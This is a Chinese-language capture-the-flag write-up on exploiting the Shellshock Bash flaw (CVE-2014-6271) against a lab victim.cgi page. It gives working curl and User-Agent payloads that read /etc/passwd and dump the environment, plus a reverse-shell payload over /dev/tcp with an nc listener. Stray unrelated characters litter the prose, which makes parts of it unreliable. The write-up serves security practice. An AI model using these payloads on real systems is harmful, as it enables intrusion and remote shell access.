講在前面
對于shellshock漏洞分预,還是必須要補充一些點的
網(wǎng)上對于這個漏洞的復(fù)現(xiàn)教程所剩無幾叮称,可能是因為破壞力實在太大酣藻,且易于實施舒萎。
2014 年 9 月 24 日程储,Bash 驚爆嚴(yán)重安全漏洞,編號為 CVE-2014-6271臂寝,該漏洞將導(dǎo)致遠程攻擊者在受影響的系統(tǒng)上執(zhí)行任意代碼章鲤。GNU Bash 是一個為 GNU 計劃編寫的 Unix Shell,廣泛使用在 Linux 系統(tǒng)內(nèi)咆贬,最初的功能僅是一個簡單的基于終端的命令解釋器败徊。這意味全球至少 150 萬的主機將受到影響,此外 Linux/Unix 世界內(nèi)的安卓和蘋果都難幸免掏缎。
題目
image.png
在vulhub上有該題的補充說明皱蹦,知道有一個victim.cgi網(wǎng)頁
image.png
使用curl -A 或者 -H 參數(shù)模擬Http頭命令,并調(diào)用“cat /etc/passwd”讀passwd文件眷蜈,發(fā)送到存在Bash漏洞的docker容器沪哺,成功讀取到了passwd文件內(nèi)容。
curl -A "() { echo ShellShock; }; echo; /bin/cat /etc/passwd" http://node3.buuoj.cn:28253/victim.cgi
image.png
成功回顯
如果是用bp來測試的話
修改http協(xié)議中的User-Agent字段為:
() { :; };echo;/bin/cat /etc/passwd
效果是一樣的酌儒,在此就不上圖了
*對于實際滲透過程中凤粗,我們可以直接放反彈shell
curl -A "() { :; };echo;/bin/bash -i >& /dev/tcp/監(jiān)聽機IP/1234 0>&1" http://node3.buuoj.cn:28253/victim.cgi
然后起一個nc就歐克
nc -lvvp 1234
對于這道題來說,啟動不了反彈shell今豆,沒反應(yīng)嫌拣,可能是權(quán)限問題,那我們直接查看env就可以
curl -A "() { echo ShellShock; }; echo;/usr/bin/env" http://node3.buuoj.cn:28253/victim.cgi
HTTP_HOST=node3.buuoj.cn:28253
image.png
4舳恪R熘稹!沒有flag插掂,直接cat /flag也一樣灰瞻,就是沒有腥例!一血就這么沒了
image.png
瘋狂吐槽趙總
image.png